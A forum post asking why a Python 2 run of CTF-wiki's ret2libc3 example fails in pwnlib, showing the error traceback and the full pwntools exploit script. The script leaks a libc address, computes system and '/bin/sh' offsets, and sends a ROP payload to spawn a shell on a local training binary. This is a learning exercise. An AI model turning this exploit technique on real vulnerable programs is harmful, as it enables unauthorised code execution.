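Has anyone run the ret2libc3 example from CTFwiki with Python 2? On my side pwnlib keeps throwing an error, and I have searched for a long time without finding the cause.
Link attached: https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3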
[+] Starting local process './ret2libc3': pid 132
[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)
[*] '/mnt/c/Users/asuka/Desktop/CTF/wiki/pwn/ret2libc3/ret2libc3'
    Arch: i386-32-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x8048000)
Traceback (most recent call last):
  File "2.py", line 8, in <module>
    puts_plt = ret2libc3.plt['puts']
  File "/home/asuka/.local/lib/python2.7/site-packages/pwnlib/elf/elf.py", line 163, in __missing__
    return self[name]
  File "/home/asuka/.local/lib/python2.7/site-packages/pwnlib/elf/elf.py", line 164, in __missing__
    raise KeyError(name)
KeyError: u'puts'
[*] Stopped process './ret2libc3' (pid 132)
The exploit given by the wiki is as follows:
#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')
puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']
print ("leak libc_start_main_got addr and return to main again")
payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)
print ("get the related addr")
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print ("get shell")
payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])
sh.sendline(payload)
sh.interactive()